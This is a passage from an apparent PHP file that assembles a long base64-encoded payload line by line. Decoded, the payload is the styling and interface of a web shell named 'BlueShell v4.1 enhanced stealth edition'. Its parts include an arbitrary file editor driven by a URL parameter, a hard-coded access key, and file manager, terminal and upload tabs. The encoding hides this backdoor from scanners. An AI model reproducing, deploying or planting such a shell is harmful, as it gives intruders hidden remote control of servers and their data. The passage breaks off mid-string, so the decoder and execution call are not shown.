$z .= "ZlcmZsb3cteTogYXV0bzsNCiAgICAg";
$z .= "ICAgICAgIGJhY2tncm91bmQ6IHJnYm";
$z .= "EoMCwgMCwgMCwgMC42KTsNCiAgICAg";
$z .= "ICAgICAgIGZvbnQtZmFtaWx5OiBtb2";
$z .= "5vc3BhY2U7DQogICAgICAgICAgICBm";
$z .= "b250LXNpemU6IDEzcHg7DQogICAgIC";
$z .= "AgICAgICBjb2xvcjogI2E1ZDZmZjsN";
$z .= "CiAgICAgICAgICAgIGxpbmUtaGVpZ2";
$z .= "h0OiAxLjU7DQogICAgICAgIH0NCg0K";
$z .= "ICAgICAgICAudGVybWluYWwtb3V0cH";
$z .= "V0IHByZSB7DQogICAgICAgICAgICBt";
$z .= "YXJnaW46IDA7DQogICAgICAgICAgIC";
$z .= "B3aGl0ZS1zcGFjZTogcHJlLXdyYXA7";
$z .= "DQogICAgICAgICAgICB3b3JkLXdyYX";
$z .= "A6IGJyZWFrLXdvcmQ7DQogICAgICAg";
$z .= "ICAgICBjb2xvcjogI2UyZjBmZjsNCi";
$z .= "AgICAgICAgfQ0KDQogICAgICAgIC50";
$z .= "ZXJtaW5hbC1pbnB1dC1hcmVhIHsNCi";
$z .= "AgICAgICAgICAgIGRpc3BsYXk6IGZs";
$z .= "ZXg7DQogICAgICAgICAgICBwYWRkaW";
$z .= "5nOiAxNXB4IDIwcHg7DQogICAgICAg";
$z .= "ICAgICBiYWNrZ3JvdW5kOiByZ2JhKD";
$z .= "AsIDAsIDAsIDAuNCk7DQogICAgICAg";
$z .= "ICAgICBib3JkZXItdG9wOiAxcHggc2";
$z .= "9saWQgdmFyKC0tYm9yZGVyKTsNCiAg";
$z .= "ICAgICAgICAgIGdhcDogMTBweDsNCi";
$z .= "AgICAgICAgICAgIGZsZXgtd3JhcDog";
$z .= "d3JhcDsNCiAgICAgICAgfQ0KDQogIC";
$z .= "AgICAgIC50ZXJtaW5hbC1wcm9tcHQg";
$z .= "ew0KICAgICAgICAgICAgY29sb3I6IH";
$z .= "ZhcigtLXByaW1hcnktbGlnaHQpOw0K";
$z .= "ICAgICAgICAgICAgZm9udC13ZWlnaH";
$z .= "Q6IGJvbGQ7DQogICAgICAgICAgICBm";
$z .= "b250LWZhbWlseTogbW9ub3NwYWNlOw";
$z .= "0KICAgICAgICAgICAgZm9udC1zaXpl";
$z .= "OiAxNnB4Ow0KICAgICAgICAgICAgbG";
$z .= "luZS1oZWlnaHQ6IDM2cHg7DQogICAg";
$z .= "ICAgIH0NCg0KICAgICAgICAudGVybW";
$z .= "luYWwtaW5wdXQgew0KICAgICAgICAg";
$z .= "ICAgZmxleDogMTsNCiAgICAgICAgIC";
$z .= "AgIG1pbi13aWR0aDogMjAwcHg7DQog";
$z .= "ICAgICAgICAgICBiYWNrZ3JvdW5kOi";
$z .= "ByZ2JhKDAsIDAsIDAsIDAuNik7DQog";
$z .= "ICAgICAgICAgICBib3JkZXI6IDFweC";
$z .= "Bzb2xpZCB2YXIoLS1ib3JkZXIpOw0K";
$z .= "ICAgICAgICAgICAgYm9yZGVyLXJhZG";
$z .= "l1czogOHB4Ow0KICAgICAgICAgICAg";
$z .= "Y29sb3I6ICNhNWQ2ZmY7DQogICAgIC";
$z .= "AgICAgICBwYWRkaW5nOiA4cHggMTVw";
$z .= "eDsNCiAgICAgICAgICAgIGZvbnQtZm";
$z .= "FtaWx5OiBtb25vc3BhY2U7DQogICAg";
$z .= "ICAgICAgICBmb250LXNpemU6IDEzcH";
$z .= "g7DQogICAgICAgIH0NCg0KICAgICAg";
$z .= "ICAudGVybWluYWwtaW5wdXQ6Zm9jdX";
$z .= "Mgew0KICAgICAgICAgICAgb3V0bGlu";
$z .= "ZTogbm9uZTsNCiAgICAgICAgICAgIG";
$z .= "JvcmRlci1jb2xvcjogdmFyKC0tcHJp";
$z .= "bWFyeSk7DQogICAgICAgIH0NCg0KIC";
$z .= "AgICAgICAucXVpY2stY21kcyB7DQog";
$z .= "ICAgICAgICAgICBkaXNwbGF5OiBmbG";
$z .= "V4Ow0KICAgICAgICAgICAgZ2FwOiA4";
$z .= "cHg7DQogICAgICAgICAgICBwYWRkaW";
$z .= "5nOiAxMHB4IDIwcHg7DQogICAgICAg";
$z .= "ICAgICBiYWNrZ3JvdW5kOiByZ2JhKD";
$z .= "AsIDAsIDAsIDAuNCk7DQogICAgICAg";
$z .= "ICAgICBib3JkZXItdG9wOiAxcHggc2";
$z .= "9saWQgdmFyKC0tYm9yZGVyKTsNCiAg";
$z .= "ICAgICAgICAgIGZsZXgtd3JhcDogd3";
$z .= "JhcDsNCiAgICAgICAgfQ0KDQogICAg";
$z .= "ICAgIC5xdWljay1jbWQgew0KICAgIC";
$z .= "AgICAgICAgcGFkZGluZzogNHB4IDE1";
$z .= "cHg7DQogICAgICAgICAgICBiYWNrZ3";
$z .= "JvdW5kOiByZ2JhKDAsIDAsIDAsIDAu";
$z .= "NSk7DQogICAgICAgICAgICBib3JkZX";
$z .= "I6IDFweCBzb2xpZCB2YXIoLS1ib3Jk";
$z .= "ZXIpOw0KICAgICAgICAgICAgYm9yZG";
$z .= "VyLXJhZGl1czogMjBweDsNCiAgICAg";
$z .= "ICAgICAgIGNvbG9yOiB2YXIoLS10ZX";
$z .= "h0LXNlY29uZGFyeSk7DQogICAgICAg";
$z .= "ICAgICBmb250LXNpemU6IDExcHg7DQ";
$z .= "ogICAgICAgICAgICBjdXJzb3I6IHBv";
$z .= "aW50ZXI7DQogICAgICAgICAgICB0cm";
$z .= "Fuc2l0aW9uOiAwLjJzOw0KICAgICAg";
$z .= "ICB9DQoNCiAgICAgICAgLnF1aWNrLW";
$z .= "NtZDpob3ZlciB7DQogICAgICAgICAg";
$z .= "ICBiYWNrZ3JvdW5kOiB2YXIoLS1wcm";
$z .= "ltYXJ5KTsNCiAgICAgICAgICAgIGNv";
$z .= "bG9yOiB3aGl0ZTsNCiAgICAgICAgfQ";
$z .= "0KDQogICAgICAgIC8qIE1vZGFsICov";
$z .= "DQogICAgICAgIC5tb2RhbCB7DQogIC";
$z .= "AgICAgICAgICBkaXNwbGF5OiBub25l";
$z .= "Ow0KICAgICAgICAgICAgcG9zaXRpb2";
$z .= "46IGZpeGVkOw0KICAgICAgICAgICAg";
$z .= "dG9wOiAwOw0KICAgICAgICAgICAgbG";
$z .= "VmdDogMDsNCiAgICAgICAgICAgIHJp";
$z .= "Z2h0OiAwOw0KICAgICAgICAgICAgYm";
$z .= "90dG9tOiAwOw0KICAgICAgICAgICAg";
$z .= "YmFja2dyb3VuZDogcmdiYSgwLCAwLC";
$z .= "AwLCAwLjcpOw0KICAgICAgICAgICAg";
$z .= "YmFja2Ryb3AtZmlsdGVyOiBibHVyKD";
$z .= "hweCk7DQogICAgICAgICAgICBhbGln";
$z .= "bi1pdGVtczogY2VudGVyOw0KICAgIC";
$z .= "AgICAgICAganVzdGlmeS1jb250ZW50";
$z .= "OiBjZW50ZXI7DQogICAgICAgICAgIC";
$z .= "B6LWluZGV4OiAxMDAwOw0KICAgICAg";
$z .= "ICB9DQoNCiAgICAgICAgLm1vZGFsLW";
$z .= "NvbnRlbnQgew0KICAgICAgICAgICAg";
$z .= "YmFja2dyb3VuZDogcmdiYSgxMCwgMj";
$z .= "UsIDQ3LCAwLjkpOw0KICAgICAgICAg";
$z .= "ICAgYmFja2Ryb3AtZmlsdGVyOiBibH";
$z .= "VyKDEycHgpOw0KICAgICAgICAgICAg";
$z .= "cGFkZGluZzogMzBweDsNCiAgICAgIC";
$z .= "AgICAgIGJvcmRlci1yYWRpdXM6IDIw";
$z .= "cHg7DQogICAgICAgICAgICBtYXgtd2";
$z .= "lkdGg6IDUwMHB4Ow0KICAgICAgICAg";
$z .= "ICAgd2lkdGg6IDkwJTsNCiAgICAgIC";
$z .= "AgICAgIGJvcmRlcjogMXB4IHNvbGlk";
$z .= "IHZhcigtLXByaW1hcnkpOw0KICAgIC";
$z .= "AgICB9DQoNCiAgICAgICAgLm1vZGFs";
$z .= "LXRpdGxlIHsNCiAgICAgICAgICAgIG";
$z .= "ZvbnQtc2l6ZTogMjJweDsNCiAgICAg";
$z .= "ICAgICAgIGZvbnQtd2VpZ2h0OiA2MD";
$z .= "A7DQogICAgICAgICAgICBjb2xvcjog";
$z .= "dmFyKC0tcHJpbWFyeS1saWdodCk7DQ";
$z .= "ogICAgICAgICAgICBtYXJnaW4tYm90";
$z .= "dG9tOiAyMHB4Ow0KICAgICAgICB9DQ";
$z .= "oNCiAgICAgICAgLm1vZGFsLWlucHV0";
$z .= "LCAubW9kYWwtdGV4dGFyZWEgew0KIC";
$z .= "AgICAgICAgICAgd2lkdGg6IDEwMCU7";
$z .= "DQogICAgICAgICAgICBwYWRkaW5nOi";
$z .= "AxMnB4IDE1cHg7DQogICAgICAgICAg";
$z .= "ICBiYWNrZ3JvdW5kOiByZ2JhKDAsID";
$z .= "AsIDAsIDAuNik7DQogICAgICAgICAg";
$z .= "ICBib3JkZXI6IDFweCBzb2xpZCB2YX";
$z .= "IoLS1ib3JkZXIpOw0KICAgICAgICAg";
$z .= "ICAgYm9yZGVyLXJhZGl1czogMTBweD";
$z .= "sNCiAgICAgICAgICAgIGNvbG9yOiB3";
$z .= "aGl0ZTsNCiAgICAgICAgICAgIGZvbn";
$z .= "Qtc2l6ZTogMTRweDsNCiAgICAgICAg";
$z .= "ICAgIG1hcmdpbi1ib3R0b206IDIwcH";
$z .= "g7DQogICAgICAgIH0NCg0KICAgICAg";
$z .= "ICAubW9kYWwtaW5wdXQ6Zm9jdXMsIC";
$z .= "5tb2RhbC10ZXh0YXJlYTpmb2N1cyB7";
$z .= "DQogICAgICAgICAgICBvdXRsaW5lOi";
$z .= "Bub25lOw0KICAgICAgICAgICAgYm9y";
$z .= "ZGVyLWNvbG9yOiB2YXIoLS1wcmltYX";
$z .= "J5KTsNCiAgICAgICAgfQ0KDQogICAg";
$z .= "ICAgIC5tb2RhbC10ZXh0YXJlYSB7DQ";
$z .= "ogICAgICAgICAgICBtaW4taGVpZ2h0";
$z .= "OiAxNTBweDsNCiAgICAgICAgICAgIH";
$z .= "Jlc2l6ZTogdmVydGljYWw7DQogICAg";
$z .= "ICAgIH0NCg0KICAgICAgICAubW9kYW";
$z .= "wtYnV0dG9ucyB7DQogICAgICAgICAg";
$z .= "ICBkaXNwbGF5OiBmbGV4Ow0KICAgIC";
$z .= "AgICAgICAgZ2FwOiAxMHB4Ow0KICAg";
$z .= "ICAgICAgICAganVzdGlmeS1jb250ZW";
$z .= "50OiBmbGV4LWVuZDsNCiAgICAgICAg";
$z .= "fQ0KDQogICAgICAgIC8qIFN5c3RlbS";
$z .= "BJbmZvICovDQogICAgICAgIC5zeXN0";
$z .= "ZW0taW5mbyB7DQogICAgICAgICAgIC";
$z .= "Bib3JkZXItcmFkaXVzOiAxMnB4Ow0K";
$z .= "ICAgICAgICAgICAgcGFkZGluZzogMT";
$z .= "VweCAyMHB4Ow0KICAgICAgICAgICAg";
$z .= "bWFyZ2luLXRvcDogMjBweDsNCiAgIC";
$z .= "AgICAgICAgIGRpc3BsYXk6IGZsZXg7";
$z .= "DQogICAgICAgICAgICBnYXA6IDMwcH";
$z .= "g7DQogICAgICAgICAgICBmbGV4LXdy";
$z .= "YXA6IHdyYXA7DQogICAgICAgICAgIC";
$z .= "Bmb250LXNpemU6IDEycHg7DQogICAg";
$z .= "ICAgICAgICBjb2xvcjogdmFyKC0tdG";
$z .= "V4dC1zZWNvbmRhcnkpOw0KICAgICAg";
$z .= "ICB9DQoNCiAgICAgICAgLmluZm8taX";
$z .= "RlbSB7DQogICAgICAgICAgICBkaXNw";
$z .= "bGF5OiBmbGV4Ow0KICAgICAgICAgIC";
$z .= "AgYWxpZ24taXRlbXM6IGNlbnRlcjsN";
$z .= "CiAgICAgICAgICAgIGdhcDogOHB4Ow";
$z .= "0KICAgICAgICB9DQoNCiAgICAgICAg";
$z .= "LmluZm8tbGFiZWwgew0KICAgICAgIC";
$z .= "AgICAgY29sb3I6IHZhcigtLXByaW1h";
$z .= "cnktbGlnaHQpOw0KICAgICAgICAgIC";
$z .= "AgZm9udC13ZWlnaHQ6IDYwMDsNCiAg";
$z .= "ICAgICAgfQ0KDQogICAgICAgIC8qIF";
$z .= "RhYnMgKi8NCiAgICAgICAgLnRhYnMg";
$z .= "ew0KICAgICAgICAgICAgZGlzcGxheT";
$z .= "ogZmxleDsNCiAgICAgICAgICAgIGdh";
$z .= "cDogMnB4Ow0KICAgICAgICAgICAgbW";
$z .= "FyZ2luLWJvdHRvbTogMjBweDsNCiAg";
$z .= "ICAgICAgICAgIHBhZGRpbmc6IDVweD";
$z .= "sNCiAgICAgICAgICAgIGJvcmRlci1y";
$z .= "YWRpdXM6IDEycHg7DQogICAgICAgIH";
$z .= "0NCg0KICAgICAgICAudGFiIHsNCiAg";
$z .= "ICAgICAgICAgIHBhZGRpbmc6IDEwcH";
$z .= "ggMjBweDsNCiAgICAgICAgICAgIGJv";
$z .= "cmRlci1yYWRpdXM6IDhweDsNCiAgIC";
$z .= "AgICAgICAgIGN1cnNvcjogcG9pbnRl";
$z .= "cjsNCiAgICAgICAgICAgIHRyYW5zaX";
$z .= "Rpb246IDAuMnM7DQogICAgICAgICAg";
$z .= "ICBmbGV4OiAxOw0KICAgICAgICAgIC";
$z .= "AgdGV4dC1hbGlnbjogY2VudGVyOw0K";
$z .= "ICAgICAgICAgICAgY29sb3I6IHZhci";
$z .= "gtLXRleHQtc2Vjb25kYXJ5KTsNCiAg";
$z .= "ICAgICAgfQ0KDQogICAgICAgIC50YW";
$z .= "IuYWN0aXZlIHsNCiAgICAgICAgICAg";
$z .= "IGJhY2tncm91bmQ6IHZhcigtLXByaW";
$z .= "1hcnkpOw0KICAgICAgICAgICAgY29s";
$z .= "b3I6IHdoaXRlOw0KICAgICAgICB9DQ";
$z .= "oNCiAgICAgICAgLnRhYi1jb250ZW50";
$z .= "IHsNCiAgICAgICAgICAgIGRpc3BsYX";
$z .= "k6IG5vbmU7DQogICAgICAgIH0NCg0K";
$z .= "ICAgICAgICAudGFiLWNvbnRlbnQuYW";
$z .= "N0aXZlIHsNCiAgICAgICAgICAgIGRp";
$z .= "c3BsYXk6IGJsb2NrOw0KICAgICAgIC";
$z .= "B9DQoNCiAgICAgICAgQG1lZGlhICht";
$z .= "YXgtd2lkdGg6IDc2OHB4KSB7DQogIC";
$z .= "AgICAgICAgICAuaGVhZGVyIHsNCiAg";
$z .= "ICAgICAgICAgICAgICBmbGV4LWRpcm";
$z .= "VjdGlvbjogY29sdW1uOw0KICAgICAg";
$z .= "ICAgICAgICAgIGFsaWduLWl0ZW1zOi";
$z .= "BzdHJldGNoOw0KICAgICAgICAgICAg";
$z .= "fQ0KICAgICAgICAgICAgLnN0YXRzIH";
$z .= "sNCiAgICAgICAgICAgICAgICBqdXN0";
$z .= "aWZ5LWNvbnRlbnQ6IHNwYWNlLWFyb3";
$z .= "VuZDsNCiAgICAgICAgICAgIH0NCiAg";
$z .= "ICAgICAgICAgIC50b29sYmFyIHsNCi";
$z .= "AgICAgICAgICAgICAgICBmbGV4LWRp";
$z .= "cmVjdGlvbjogY29sdW1uOw0KICAgIC";
$z .= "AgICAgICAgfQ0KICAgICAgICAgICAg";
$z .= "LmZpbGUtdGFibGUgew0KICAgICAgIC";
$z .= "AgICAgICAgIGRpc3BsYXk6IGJsb2Nr";
$z .= "Ow0KICAgICAgICAgICAgICAgIG92ZX";
$z .= "JmbG93LXg6IGF1dG87DQogICAgICAg";
$z .= "ICAgICB9DQogICAgICAgICAgICAudG";
$z .= "VybWluYWwtaW5wdXQtYXJlYSB7DQog";
$z .= "ICAgICAgICAgICAgICAgZmxleC1kaX";
$z .= "JlY3Rpb246IGNvbHVtbjsNCiAgICAg";
$z .= "ICAgICAgIH0NCiAgICAgICAgICAgIC";
$z .= "50ZXJtaW5hbC1wcm9tcHQgew0KICAg";
$z .= "ICAgICAgICAgICAgIGRpc3BsYXk6IG";
$z .= "5vbmU7DQogICAgICAgICAgICB9DQog";
$z .= "ICAgICAgIH0NCiAgICA8L3N0eWxlPg";
$z .= "0KPC9oZWFkPg0KPGJvZHk+DQogICAg";
$z .= "PGRpdiBjbGFzcz0iY29udGFpbmVyIj";
$z .= "4NCiAgICAgICAgPCEtLSBIZWFkZXIg";
$z .= "LS0+DQogICAgICAgIDxkaXYgY2xhc3";
$z .= "M9ImhlYWRlciI+DQogICAgICAgICAg";
$z .= "ICA8ZGl2IGNsYXNzPSJsb2dvIj4NCi";
$z .= "AgICAgICAgICAgICAgICA8ZGl2IGNs";
$z .= "YXNzPSJsb2dvLWljb24iPvCflLc8L2";
$z .= "Rpdj4NCiAgICAgICAgICAgICAgICA8";
$z .= "ZGl2IGNsYXNzPSJsb2dvLXRleHQiPg";
$z .= "0KICAgICAgICAgICAgICAgICAgICA8";
$z .= "aDE+Qmx1ZVNoZWxsIHY0LjE8L2gxPg";
$z .= "0KICAgICAgICAgICAgICAgICAgICA8";
$z .= "c3Bhbj5lbmhhbmNlZCBzdGVhbHRoIG";
$z .= "VkaXRpb248L3NwYW4+DQogICAgICAg";
$z .= "ICAgICAgICAgPC9kaXY+DQogICAgIC";
$z .= "AgICAgICA8L2Rpdj4NCiAgICAgICAg";
$z .= "ICAgIDxkaXYgY2xhc3M9InN0YXRzIj";
$z .= "4NCiAgICAgICAgICAgICAgICA8ZGl2";
$z .= "IGNsYXNzPSJzdGF0LWl0ZW0iPg0KIC";
$z .= "AgICAgICAgICAgICAgICAgICA8ZGl2";
$z .= "IGNsYXNzPSJzdGF0LXZhbHVlIj48Pz";
$z .= "0gcGhwdmVyc2lvbigpID8+PC9kaXY+";
$z .= "DQogICAgICAgICAgICAgICAgICAgID";
$z .= "xkaXYgY2xhc3M9InN0YXQtbGFiZWwi";
$z .= "PlBIUDwvZGl2Pg0KICAgICAgICAgIC";
$z .= "AgICAgIDwvZGl2Pg0KICAgICAgICAg";
$z .= "ICAgICAgIDxkaXYgY2xhc3M9InN0YX";
$z .= "QtaXRlbSI+DQogICAgICAgICAgICAg";
$z .= "ICAgICAgIDxkaXYgY2xhc3M9InN0YX";
$z .= "QtdmFsdWUiPjw/PSBnZXRfY3VycmVu";
$z .= "dF91c2VyKCkgPz48L2Rpdj4NCiAgIC";
$z .= "AgICAgICAgICAgICAgICAgPGRpdiBj";
$z .= "bGFzcz0ic3RhdC1sYWJlbCI+VVNFUj";
$z .= "wvZGl2Pg0KICAgICAgICAgICAgICAg";
$z .= "IDwvZGl2Pg0KICAgICAgICAgICAgIC";
$z .= "AgIDxkaXYgY2xhc3M9InN0YXQtaXRl";
$z .= "bSI+DQogICAgICAgICAgICAgICAgIC";
$z .= "AgIDxkaXYgY2xhc3M9InN0YXQtdmFs";
$z .= "dWUiPjw/PSBkYXRlKCdIOmknKSA/Pj";
$z .= "wvZGl2Pg0KICAgICAgICAgICAgICAg";
$z .= "ICAgICA8ZGl2IGNsYXNzPSJzdGF0LW";
$z .= "xhYmVsIj5USU1FPC9kaXY+DQogICAg";
$z .= "ICAgICAgICAgICAgPC9kaXY+DQogIC";
$z .= "AgICAgICAgICA8L2Rpdj4NCiAgICAg";
$z .= "ICAgPC9kaXY+DQoNCiAgICAgICAgPC";
$z .= "EtLSBNZXNzYWdlcyAtLT4NCiAgICAg";
$z .= "ICAgPD9waHAgaWYgKCRtZXNzYWdlKT";
$z .= "ogPz4NCiAgICAgICAgICAgIDxkaXYg";
$z .= "Y2xhc3M9Im1lc3NhZ2UgbWVzc2FnZS";
$z .= "1zdWNjZXNzIj7inIUgPD89IGh0bWxz";
$z .= "cGVjaWFsY2hhcnMoJG1lc3NhZ2UpID";
$z .= "8+PC9kaXY+DQogICAgICAgIDw/cGhw";
$z .= "IGVuZGlmOyA/Pg0KICAgICAgICA8P3";
$z .= "BocCBpZiAoJGVycm9yKTogPz4NCiAg";
$z .= "ICAgICAgICAgIDxkaXYgY2xhc3M9Im";
$z .= "1lc3NhZ2UgbWVzc2FnZS1lcnJvciI+";
$z .= "4p2MIDw/PSBodG1sc3BlY2lhbGNoYX";
$z .= "JzKCRlcnJvcikgPz48L2Rpdj4NCiAg";
$z .= "ICAgICAgPD9waHAgZW5kaWY7ID8+DQ";
$z .= "oNCiAgICAgICAgPD9waHAgaWYgKGlz";
$z .= "c2V0KCRfR0VUWydlZGl0J10pKTogDQ";
$z .= "ogICAgICAgICAgICAkZWRpdF9maWxl";
$z .= "ID0gJF9HRVRbJ2VkaXQnXTsNCiAgIC";
$z .= "AgICAgICAgICRmaWxlX2NvbnRlbnQg";
$z .= "PSBmaWxlX2V4aXN0cygkZWRpdF9maW";
$z .= "xlKSA/IGZpbGVfZ2V0X2NvbnRlbnRz";
$z .= "KCRlZGl0X2ZpbGUpIDogJyc7DQogIC";
$z .= "AgICAgICAgICAkZmlsZV93cml0YWJs";
$z .= "ZSA9IGlzX3dyaXRhYmxlKCRlZGl0X2";
$z .= "ZpbGUpOw0KICAgICAgICA/Pg0KICAg";
$z .= "ICAgICA8ZGl2IHN0eWxlPSJiYWNrZ3";
$z .= "JvdW5kOiByZ2JhKDEwLCAyNSwgNDcs";
$z .= "IDAuOCk7IGJvcmRlci1yYWRpdXM6ID";
$z .= "E2cHg7IGJvcmRlcjogMXB4IHNvbGlk";
$z .= "IHJnYmEoMzMsMTUwLDI0MywwLjQpOy";
$z .= "BvdmVyZmxvdzogaGlkZGVuOyBiYWNr";
$z .= "ZHJvcC1maWx0ZXI6IGJsdXIoMTBweC";
$z .= "k7Ij4NCiAgICAgICAgICAgIDxkaXYg";
$z .= "Y2xhc3M9InRlcm1pbmFsLWhlYWRlci";
$z .= "I+DQogICAgICAgICAgICAgICAgPHNw";
$z .= "YW4gY2xhc3M9InRlcm1pbmFsLXRpdG";
$z .= "xlIj7wn5OdIEVkaXRpbmc6IDw/PSBo";
$z .= "dG1sc3BlY2lhbGNoYXJzKGJhc2VuYW";
$z .= "1lKCRlZGl0X2ZpbGUpKSA/Pjwvc3Bh";
$z .= "bj4NCiAgICAgICAgICAgICAgICA8c3";
$z .= "BhbiBjbGFzcz0idGVybWluYWwtY3dk";
$z .= "Ij48Pz0gZmlsZV9leGlzdHMoJGVkaX";
$z .= "RfZmlsZSkgPyBmb3JtYXRCeXRlcyhm";
$z .= "aWxlc2l6ZSgkZWRpdF9maWxlKSkgOi";
$z .= "AnJyA/Pjwvc3Bhbj4NCiAgICAgICAg";
$z .= "ICAgIDwvZGl2Pg0KICAgICAgICAgIC";
$z .= "AgPGZvcm0gbWV0aG9kPSJQT1NUIiBz";
$z .= "dHlsZT0icGFkZGluZzogMjBweDsiPg";
$z .= "0KICAgICAgICAgICAgICAgIDxpbnB1";
$z .= "dCB0eXBlPSJoaWRkZW4iIG5hbWU9Im";
$z .= "ZpbGVfcGF0aCIgdmFsdWU9Ijw/PSBo";
$z .= "dG1sc3BlY2lhbGNoYXJzKCRlZGl0X2";
$z .= "ZpbGUpID8+Ij4NCiAgICAgICAgICAg";
$z .= "ICAgICA8dGV4dGFyZWEgbmFtZT0iY2";
$z .= "9udGVudCIgc3R5bGU9IndpZHRoOiAx";
$z .= "MDAlOyBtaW4taGVpZ2h0OiA0MDBweD";
$z .= "sgYmFja2dyb3VuZDogcmdiYSgwLDAs";
$z .= "MCwwLjYpOyBjb2xvcjogI2E1ZDZmZj";
$z .= "sgYm9yZGVyOiAxcHggc29saWQgcmdi";
$z .= "YSgzMywxNTAsMjQzLDAuNCk7IHBhZG";
$z .= "Rpbmc6IDIwcHg7IGZvbnQtZmFtaWx5";
$z .= "OiBtb25vc3BhY2U7IGJvcmRlci1yYW";
$z .= "RpdXM6IDEycHg7IHJlc2l6ZTogdmVy";
$z .= "dGljYWw7IiA8Pz0gISRmaWxlX3dyaX";
$z .= "RhYmxlID8gJ3JlYWRvbmx5JyA6ICcn";
$z .= "ID8+Pjw/PSBodG1sc3BlY2lhbGNoYX";
$z .= "JzKCRmaWxlX2NvbnRlbnQpID8+PC90";
$z .= "ZXh0YXJlYT4NCiAgICAgICAgICAgIC";
$z .= "AgICA8ZGl2IHN0eWxlPSJkaXNwbGF5";
$z .= "OiBmbGV4OyBnYXA6IDEwcHg7IG1hcm";
$z .= "dpbi10b3A6IDIwcHg7IGZsZXgtd3Jh";
$z .= "cDogd3JhcDsiPg0KICAgICAgICAgIC";
$z .= "AgICAgICAgICA8P3BocCBpZiAoJGZp";
$z .= "bGVfd3JpdGFibGUpOiA/Pg0KICAgIC";
$z .= "AgICAgICAgICAgICAgICA8YnV0dG9u";
$z .= "IHR5cGU9InN1Ym1pdCIgbmFtZT0ic2";
$z .= "F2ZV9maWxlIiBjbGFzcz0iYnRuIGJ0";
$z .= "bi1wcmltYXJ5Ij7wn5K+IFNhdmUgQ2";
$z .= "hhbmdlczwvYnV0dG9uPg0KICAgICAg";
$z .= "ICAgICAgICAgICAgICA8P3BocCBlbm";
$z .= "RpZjsgPz4NCiAgICAgICAgICAgICAg";
$z .= "ICAgICAgPGEgaHJlZj0iP2F1dGg9Ym";
$z .= "x1ZV9hY2Nlc3MmcGF0aD08Pz0gdXJs";
$z .= "ZW5jb2RlKGRpcm5hbWUoJGVkaXRfZm";
$z .= "lsZSkpID8+IiBjbGFzcz0iYnRuIj7i";
$z .= "hpAgQmFjazwvYT4NCiAgICAgICAgIC";
$z .= "AgICAgICA8L2Rpdj4NCiAgICAgICAg";
$z .= "ICAgIDwvZm9ybT4NCiAgICAgICAgPC";
$z .= "9kaXY+DQogICAgICAgIDw/cGhwIGVs";
$z .= "c2U6ID8+DQoNCiAgICAgICAgPCEtLS";
$z .= "BUYWJzIC0tPg0KICAgICAgICA8ZGl2";
$z .= "IGNsYXNzPSJ0YWJzIj4NCiAgICAgIC";
$z .= "AgICAgIDxkaXYgY2xhc3M9InRhYiBh";
$z .= "Y3RpdmUiIG9uY2xpY2s9InN3aXRjaF";
$z .= "RhYignZmlsZXMnKSI+8J+TgSBGaWxl";
$z .= "IE1hbmFnZXI8L2Rpdj4NCiAgICAgIC";
$z .= "AgICAgIDxkaXYgY2xhc3M9InRhYiIg";
$z .= "b25jbGljaz0ic3dpdGNoVGFiKCd0ZX";
$z .= "JtaW5hbCcpIj7imqEgVGVybWluYWw8";
$z .= "L2Rpdj4NCiAgICAgICAgICAgIDxkaX";
$z .= "YgY2xhc3M9InRhYiIgb25jbGljaz0i";
$z .= "c3dpdGNoVGFiKCd1cGxvYWQnKSI+8J";
$z .= "+TpCBVcGxvYWQgJiBaSVA8L2Rpdj4N";
$z .= "CiAgICAgICAgPC9kaXY+DQoNCiAgIC";
$z .= "AgICAgPCEtLSBGaWxlcyBUYWIgLS0+";
$z .= "DQogICAgICAgIDxkaXYgaWQ9ImZpbG";
$z .= "VzLXRhYiIgY2xhc3M9InRhYi1jb250";
$z .= "ZW50IGFjdGl2ZSI+DQogICAgICAgIC";
$z .= "AgICA8ZGl2IGNsYXNzPSJwYXRoLW5h";
$z .= "diI+DQogICAgICAgICAgICAgICAgPD";
$z .= "9waHANCiAgICAgICAgICAgICAgICAk";
$z .= "cGFydHMgPSBleHBsb2RlKCcvJywgdH";
$z .= "JpbSgkY3VycmVudF9wYXRoLCAnLycp";
$z .= "KTsNCiAgICAgICAgICAgICAgICAkYn";
$z .= "VpbHQgPSAnJzsNCiAgICAgICAgICAg";
$z .= "ICAgICBmb3JlYWNoICgkcGFydHMgYX";
$z .= "MgJGkgPT4gJHBhcnQpOg0KICAgICAg";
$z .= "ICAgICAgICAgICAgICAkYnVpbHQgLj";
$z .= "0gJy8nIC4gJHBhcnQ7DQogICAgICAg";
$z .= "ICAgICAgICAgPz4NCiAgICAgICAgIC";
$z .= "AgICAgICAgICAgPGEgaHJlZj0iP2F1";
$z .= "dGg9Ymx1ZV9hY2Nlc3MmcGF0aD08Pz";
$z .= "0gdXJsZW5jb2RlKCRidWlsdCkgPz4i";
$z .= "IGNsYXNzPSJwYXRoLWl0ZW0gPD89IC";
$z .= "RpID09PSBjb3VudCgkcGFydHMpLTEg";
$z .= "PyAncGF0aC1jdXJyZW50JyA6ICcnID";
$z .= "8+Ij4NCiAgICAgICAgICAgICAgICAg";
$z .= "ICAgICAgIDw/PSBodG1sc3BlY2lhbG";
$z .= "NoYXJzKCRwYXJ0ID86ICcvJykgPz4N";
$z .= "CiAgICAgICAgICAgICAgICAgICAgPC";
$z .= "9hPg0KICAgICAgICAgICAgICAgICAg";
$z .= "ICA8P3BocCBpZiAoJGkgPCBjb3VudC";
$z .= "gkcGFydHMpLTEpOiA/Pg0KICAgICAg";
$z .= "ICAgICAgICAgICAgICAgICAgPHNwYW";
$z .= "4gY2xhc3M9InBhdGgtc2VwIj4vPC9z";
$z .= "cGFuPg0KICAgICAgICAgICAgICAgIC";
$z .= "AgICA8P3BocCBlbmRpZjsgPz4NCiAg";
$z .= "ICAgICAgICAgICAgICA8P3BocCBlbm";
$z .= "Rmb3JlYWNoOyA/Pg0KICAgICAgICAg";
$z .= "ICAgPC9kaXY+DQoNCiAgICAgICAgIC";
$z .= "AgIDxkaXYgY2xhc3M9InRvb2xiYXIi";
$z .= "Pg0KICAgICAgICAgICAgICAgIDxidX";
$z .= "R0b24gY2xhc3M9ImJ0biBidG4tcHJp";
$z .= "bWFyeSIgb25jbGljaz0ic2hvd01vZG";
$z .= "FsKCd1cGxvYWQnKSI+8J+TpCBVcGxv";
$z .= "YWQgRmlsZTwvYnV0dG9uPg0KICAgIC";
$z .= "AgICAgICAgICAgIDxidXR0b24gY2xh";
$z .= "c3M9ImJ0biBidG4tc3VjY2VzcyIgb2";
$z .= "5jbGljaz0ic2hvd01vZGFsKCd6aXAn";
